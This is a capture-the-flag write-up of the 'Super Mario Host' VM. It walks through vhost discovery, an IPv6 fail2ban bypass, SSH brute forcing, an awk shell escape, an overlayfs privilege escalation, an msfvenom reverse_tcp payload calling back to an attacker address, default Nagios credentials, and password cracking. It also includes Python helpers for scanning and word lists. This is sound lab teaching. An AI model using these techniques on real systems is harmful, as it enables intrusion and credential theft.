8/23/2021

Super Mario Host is a Super Mario Bros. themed CTF virtual machine created by mr_h4sh. The goal is to find the two hidden flags and to recover the passwords of every character with an account on the system.

Service Discovery

Running Nmap revealed that the target machine had an SSH server on port 22 and an HTTP server on port 8180. Based on Nmap's service fingerprinting, they appeared to be OpenSSH 6.6.1p1 and Apache:

Analysis of Web Server

Taking a look at the default page being served by the web server suggested nginx rather than Apache, as it was the stock nginx welcome page:

Welcome to nginx!
If you see this page, the nginx web server is successfully installed and working. Further configuration is required.

For online documentation and support please refer to nginx.org.
Commercial support is available at nginx.org.

Thank you for using nginx.

Nikto agreed with Nmap that the web server was indeed Apache, and also found one of the default Apache files, but nothing else of interest. That is the stronger evidence: the page body is just a file and says nothing about the daemon serving it, whereas the Server banner and Apache-specific default files do:

Running dirb using the big.txt wordlist uncovered a single interesting entry, which was a file named vhosts:

The file contained an Apache virtual host configuration, alluding to a vhost being configured on the machine:

Name-based virtual hosts work by matching the value of the Host header of an HTTP request against the ServerName (and any ServerAlias) of each configured vhost, and serving from that vhost's document root; a request whose Host matches nothing falls through to the first vhost defined, which is why addressing the box by IP returned the nginx-style page. In this instance, if the server is addressed as http://mario.supermariohost.local:8180/ rather than http://10.2.0.104:8180/, it serves mario.php from the /var/www/supermariohost directory.

cURL can set the Host header directly with its -H option, but in order to view the rendered pages in a browser I added an entry to my hosts file by running echo '10.2.0.104 mario.supermariohost.local' >> /etc/hosts
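To show the mechanism rather than just the Apache config, here is a miniature name-based vhost server with a client that sets the Host header the way curl -H 'Host: ...' does. This is an added example, not the CTF's Apache configuration or the author's tooling; the two document roots are hypothetical in-memory stand-ins for /var/www/supermariohost and the default site, and the server listens on an ephemeral loopback port so it runs offline.

```python
"""Name-based virtual hosting in miniature: one listener, content chosen by
the Host header. Added example, not the CTF's Apache config."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical stand-in for /var/www/supermariohost on the real box.
VHOSTS = {
    "mario.supermariohost.local": {
        "/": "<h1>mario.php</h1>",
        "/luigi.php": "Hey!! It'sa Luiiiggiii!!",
    },
}
# Hypothetical stand-in for the default vhost, which served the copied nginx page.
DEFAULT_SITE = {"/": "<h1>Welcome to nginx!</h1>"}


class VHostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Apache matches Host (minus any :port) against ServerName/ServerAlias;
        # a request that matches nothing falls through to the first/default vhost.
        host = self.headers.get("Host", "").split(":")[0].lower()
        site = VHOSTS.get(host, DEFAULT_SITE)
        body = site.get(self.path.split("?")[0])
        payload = (body if body is not None else "Not Found").encode()
        self.send_response(200 if body is not None else 404)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_server():
    """Serve on an ephemeral loopback port in a background thread."""
    server = HTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def fetch(port, path="/", host_header=None):
    """GET path with an explicit Host header (omitted -> http.client sets 127.0.0.1:port).
    Returns (status, body)."""
    headers = {"Host": host_header} if host_header else {}
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return resp.status, body


if __name__ == "__main__":
    server, port = start_server()
    print(fetch(port))                                                  # default vhost
    print(fetch(port, host_header="mario.supermariohost.local:8180"))  # Mario vhost
    print(fetch(port, "/luigi.php", "mario.supermariohost.local"))
    server.shutdown()
```

Note that the port suffix in the Host header is stripped before matching, which is why the browser's mario.supermariohost.local:8180 and a bare Host: mario.supermariohost.local from cURL both land on the same vhost, and why a hidden file such as luigi.php is only reachable once the right Host value is supplied.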

Once the hosts file was updated, I navigated to the page and poked around the JavaScript to see if there were any interesting easter eggs, but didn’t find anything; just a small Mario game:

I also re-ran Nikto and dirb, but this time specifying the Mario vhost using nikto -host 10.2.0.104:8180 -vhost mario.supermariohost.local and dirb http://10.2.0.104:8180 /usr/share/wordlists/dirb/big.txt -H 'Host: mario.supermariohost.local'. Neither scan discovered any new files being served.

Rewinding to the vhost file: as mario.php was being served as the default page, I tried luigi.php and found a message from Mario’s taller, greener brother:

Hey!! It’sa Luiiiggiii!!
My short brother doesn’t know that I’m wandering around his host and messing around, he’s new with computers!
Since I’m here I want to tell you more about myself… my brother is a nice person but we are in love for the same person: Princess Peach! I hope she will find out about this.
I Love Peach
Forever yours,
Luigi

As I manually found two files named after Super Mario characters, I put together a word list using character names from the series to use with dirb, but none yielded any hits (other than the already identified mario.php and luigi.php).

SSH Enumeration & Analysis

With no more leads to follow on the web server, I began to enumerate the users on the SSH server using the ssh_enumusers Metasploit module.

The user list I used for this was the word list I had previously generated containing the Super Mario character names.

There was an interesting pattern in these results which made me believe I was getting false positives: for every user it believed it had found, the attempt on the next user timed out, for example:

As the timeouts followed such a consistent pattern, I suspected something like fail2ban was running, which bans an IP address for a set period once it sees enough failed attempts in the log files of the services it monitors.

On the off-chance it was indeed fail2ban causing the timeouts, I decided to try enumeration over IPv6 instead, as fail2ban had no IPv6 support at all at the time (June 2017). Note that fail2ban 0.10, released later in 2017, added IPv6 support, so this bypass should not be assumed to work against current installations.

To do this, I needed to identify the IPv6 address of the target machine, which I did using the ipv6_multicast_ping Metasploit module; though, this can also be done using the ping6 application.

As there were two hosts with IPv6 addresses responding to the multicast, I ran Nmap against them to narrow down which one is the target, and found that fe80::a00:27ff:febe:21fc had the same open ports:

N.B. %eth1 is appended to the IPv6 address in some places to indicate which interface to use: fe80:: addresses are link-local, so a zone identifier is needed to tell the stack which interface the neighbour is reachable on. For modules and applications that let you specify the interface separately, it can be omitted.

After identifying the IPv6 address of the target, I began to re-run the ssh_enumusers module against it. This time, every request was timing out, however the port was definitely open and the service was definitely listening, which indicated that the Metasploit module may not support IPv6.

As a result of the module failing, I went on the hunt for an SSH brute force script and came across getsshpass.sh by Radovan Brezula.

This script doesn’t support IPv6 out of the box, but I made a few quick modifications to it in order to use it against the IPv6 target.

The modified script can be downloaded from This Gist or can be found below:

For the sake of testing if IPv6 activity was being monitored, I ran the script, using the character word list I had created as both the username and password list. It iterated through every combination, without any timeouts, which indicated that IPv6 was open to a brute force attack.

Brute Forcing the SSH Server

Once I had confirmed there was no IPv6 monitoring and had a reliable script to perform the attack, I built a new word list using CeWL and John [the Ripper] based on the content of Luigi’s message in luigi.php. I then used the word list to brute force the SSH server using getsshpass.sh:

Escaping Limited Shell & Privilege Escalation

As can be seen in the previous screenshot, Luigi’s user was stuck in a limited shell, with access to awk, cat, cd, clear, echo, exit, help, history, ll, lpath, ls, lsudo and vim.

Before trying to break out of the shell, I checked out the contents of Luigi’s home directory and took a look at the message file:

My first attempt at breaking out of the shell was to use command execution from within vim, but the installed version of vim does not allow this. As awk was available, I was able to break out instead by running awk 'BEGIN {system("/bin/bash")}' (note the double quotes around the command; nesting single quotes inside a single-quoted awk program would break the quoting).

Once out of the shell, I proceeded to look around to see if there was anything that may help me get root, but didn’t find anything interesting and instead compiled the overlayfs exploit and escalated using it:

Acquiring and Cracking First Flag

Now that I had root access, I used msfvenom to create a Meterpreter executable by running msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.2.0.3 -f elf > shell.elf and executed it on the target whilst running the multi_handler module in Metasploit.

Once I had a Meterpreter session, I began to poke around in /root and found a file named flag.zip. I tried to unzip this on the target, and found that the ZIP file is password protected; so I proceeded to download it and try to crack it using fcrackzip and the word list I had previously generated to crack the SSH passwords:

As none of the passwords in the word list were successful, I tried again using the rockyou.txt word list, and successfully found the password:

The first flag contained a message from mr_h4sh that also indicates that in addition to finding the flag, the user should also be attempting to get the passwords for all the users on the machine:

Well done :D If you reached this it means you got root, congratulations. Now, there are multiple ways to hack this machine. The goal is to get all the passwords of all the users in this machine. If you did it, then congratulations, I hope you had fun :D

Keep in touch on twitter through @mr_h4sh

Congratulations again!

mr_h4sh

Finding Mario’s Password

With the previous message from mr_h4sh in mind, I ran a couple of post modules in the Meterpreter session to gather the password hashes and see if any SSH credentials were stored on the system. No SSH credentials were found, but I had the hashes that I could try to crack using JTR:

Once I had the hashes, I created a new word list using Mario’s ZIP file password [ilovepeach] as the seed for the permutations and ran JTR to get the last two passwords from the system:

Service Discovery on the Warluigi VM

With the first flag down, I began more recon work to try and find the second flag. Part of this involved checking the running processes using ps aux, where I found that a nested VM named warluigi was running inside the Mario host.

Running ifconfig on the Mario host revealed the network adapter [virbr0] that is being used with the Warluigi VM:

As Nmap wasn’t available on the Mario host, I grabbed a host discovery script and modified it to scan the 192.168.122.0/24 subnet:

I then uploaded and executed it on the Mario host to identify what address had been assigned to the Warluigi host, which was 192.168.122.122:
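When there is no nmap on the pivot box, a short TCP connect sweep does the job; the following is an added example rather than the script the write-up actually used, and it swaps a ping sweep for TCP probes on 22 and 80 (the ports that later turned out to be open on Warluigi). The /24 prefix is the libvirt default network from the write-up; the loopback listener helper exists only so the sweep can be exercised offline.

```python
"""TCP connect sweep for host discovery on a pivot box without nmap.
Added example, not the author's script; assumes targets accept TCP on 22 or 80."""
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=0.5):
    """True if a TCP handshake to host:port completes within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out
        return False


def sweep(hosts, ports=(22, 80), timeout=0.5, workers=64):
    """Return {host: [open ports]} for every host that accepted at least one connection."""
    found = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        jobs = {pool.submit(probe, h, p, timeout): (h, p) for h in hosts for p in ports}
        for job, (host, port) in jobs.items():
            if job.result():
                found.setdefault(host, []).append(port)
    return {h: sorted(p) for h, p in found.items()}


def subnet_hosts(prefix, first=1, last=254):
    """Host addresses of a /24, e.g. subnet_hosts("192.168.122") gives .1 to .254."""
    return [f"{prefix}.{i}" for i in range(first, last + 1)]


def open_listener():
    """Bind a throwaway loopback listener so the sweep can be tested offline."""
    sock = socket.socket()
    sock.bind(("127.0.0.1", 0))
    sock.listen(5)
    return sock, sock.getsockname()[1]


if __name__ == "__main__":
    # Run from the Mario host against the libvirt default network.
    print(sweep(subnet_hosts("192.168.122")))
```

A connect sweep is noisier than ICMP (every probe shows up as an accepted connection in the target's logs) but needs no raw sockets or root, which matters when the pivot shell is unprivileged.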

Next, I used Metasploit’s pivoting functionality to route traffic to 192.168.122.0/24 via the Meterpreter session I had established to the Mario host and proceeded to run a port scan on the Warluigi VM:

The results of the port scan indicated that ports 22 and 80 were open with services listening on them, so I loaded up the ssh_version module to verify which SSH server was running and to try and fingerprint the OS; which is seemingly Ubuntu 14.04:

Warluigi Web Server Fingerprinting

As the web server running on the Warluigi machine wasn’t visible from outside the Mario host, I setup a port forward via the Meterpreter session to get access to it:

With the port forward setup, I proceeded to run Nikto and dirb against the web server. Nikto was unable to find anything of interest, but dirb did find a Nagios installation that is protected by basic authentication:

Metasploit contained no entry for Nagios in its default credentials list, but a quick search revealed that the default credentials for certain versions of Nagios are nagiosadmin:nagios, which was the case on the Warluigi VM.

I looked around the Nagios management page, but couldn’t find any functionality that seemed exploitable at first glance, and none of the exploits I tried were successful.

More Enumeration and Private Key Cracking

As there didn’t seem to be any vulnerabilities in the web server, I went back to the Mario host session and began doing more enumeration. Meterpreter had previously failed to find any SSH keys, so I decided to search the entire file system, rather than just the default locations the post module checks:

The particularly interesting files found in this search were:

  • /.bak/users/luigi/id_rsa
  • /.bak/users/luigi/id_rsa.pub

I headed over to the /.bak/users/luigi directory and had a look at what else was in there and found another message file:

As the key was presumably going to get me access to the Warluigi VM, I proceeded to set up another port forward, this time to port 22, and tried to connect using id_rsa:

After forgetting to apply the correct permissions, I ran chmod 400 warluigi_rsa/id_rsa and tried again, to find that the key had a passphrase.

In an attempt to build a relevant word list, I used three words as the seeds for the permutations:

  • warluigi (the name of the VM)
  • war (one of the two quoted words in Mario’s last message)
  • naughty (the other quoted word in Mario’s last message)

Once I had the word list built, I proceeded to run the private key through ssh2john and then cracked it using JTR:

Getting Root on Warluigi VM

Much like the Mario host, getting root on the Warluigi VM is just a case of compiling and running the overlayfs exploit:

Once I had root, I setup the multi_handler module in Metasploit again, but this time with the bind_tcp payload, in order to get a Meterpreter session on Warluigi:

Finding & Cracking the Last Flag

After getting the Meterpreter session, I took a look in /root as per the previous host, and found a file named .hint.txt and another ZIP file that seemingly contained a flag:

The hint file contained another message about Princess Peach:

So, today I saw her again, Peach. I’m so in love for her but my brother is completely lost for her.
I know that he loves Peach, but Peach Loves Me.

Also within the /root directory was a .mozilla directory, suggesting that the machine may have Firefox data on it, which led me to run the firefox_creds post module, but it returned nothing:

Next, I dumped the user hashes, as I’d have to crack these to finish the challenge anyway:

I continued to look for some plain-text credentials that may be hanging around the system by checking out the Nagios installation. The sample configuration file that I found in /opt/nagios-4.1.1/sample-config/nagios.cfg suggested that there was a resource file that could store passwords in it:

I checked the default location of resource.cfg, and whilst the file was there, it contained no passwords. Likewise, the only user within /usr/local/nagios/etc/htpasswd.users was the previously identified default user [nagiosadmin], so it seemed this was just an unconfigured installation without much to go on.

Having failed to find any plain text credentials, I proceeded to build up a new word list, using the previously found hint file as a basis for it. The phrase “Peach Loves Me” stood out in the hint file, as it was in proper case, so I created a few permutations of this manually along with “warluigi” and used them as the seed for the word list I created using JTR:
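Every word list in this write-up (the CeWL harvest of luigi.php, the ilovepeach permutations used on the Mario hashes, the warluigi/war/naughty seeds for the key passphrase, and the "Peach Loves Me" seeds here) follows the same pattern: harvest a few seeds from the target, then mangle them. The script below is an added example of that pattern, not the author's CeWL/John invocations; the leet substitutions and suffixes are illustrative choices rather than John's rule set, and the message it harvests is a constructed stand-in.

```python
"""Seed-based word list generation, in the spirit of the CeWL + John rules
passes used throughout this write-up. Added example; not the author's tooling."""
import re

# Illustrative substitutions and suffixes, not John the Ripper's default rules.
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SUFFIXES = ("", "!", "1", "123", "2017")


def extract_words(text, min_len=4):
    """CeWL-style harvest: unique lower-case words of at least min_len letters,
    in order of first appearance, from a page or message body."""
    words = []
    for word in re.findall(r"[A-Za-z]+", text):
        word = word.lower()
        if len(word) >= min_len and word not in words:
            words.append(word)
    return words


def case_variants(word):
    """The original plus the usual case rules (lower, upper, capitalised, swapped)."""
    return {word, word.lower(), word.upper(), word.capitalize(), word.swapcase()}


def join_variants(phrase):
    """Ways of collapsing a phrase such as "Peach Loves Me" into one token."""
    parts = phrase.split()
    return {
        "".join(parts),
        "".join(p.capitalize() for p in parts),
        "_".join(parts),
        "-".join(parts),
    }


def mangle(seed):
    """All candidates derived from one seed: joins x cases x leet x reverse x suffixes."""
    base = set()
    for joined in join_variants(seed):
        base |= case_variants(joined)
    base |= {w.translate(LEET) for w in base}
    base |= {w[::-1] for w in base}
    return {w + suffix for w in base for suffix in SUFFIXES}


def build_wordlist(seeds):
    """Deduplicated, sorted candidate list for every seed (single words or phrases)."""
    candidates = set()
    for seed in seeds:
        candidates |= mangle(seed)
    return sorted(candidates)


if __name__ == "__main__":
    # Constructed stand-in for the kind of text harvested from luigi.php.
    message = "my brother is a nice person but we are in love for the same person: Princess Peach!"
    seeds = extract_words(message) + ["ilovepeach", "Peach Loves Me", "warluigi"]
    for candidate in build_wordlist(seeds):
        print(candidate)
```

The point of keeping the seed list tiny is that the mangling step multiplies it: a handful of theme words already yields a few thousand candidates, which is why a targeted list cracked both ZIP files in seconds where rockyou.txt would have been the slow path.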

With the word list created, I attempted to crack the ZIP file with it, and got an almost instant result:

The content of the second and last flag reads:

Congratulations on your second flag!

As already mentioned in supermariohost, there are multiple ways to hack this machine. The goal is to get all the passwords of all the users in this machine. If you did it, then congratulations, I hope you had fun :D

Keep in touch on twitter through @mr_h4sh

Congratulations again!

mr_h4sh

And to finish up, I used the same word list to try and crack the user password hashes and revealed both the warluigi and root passwords: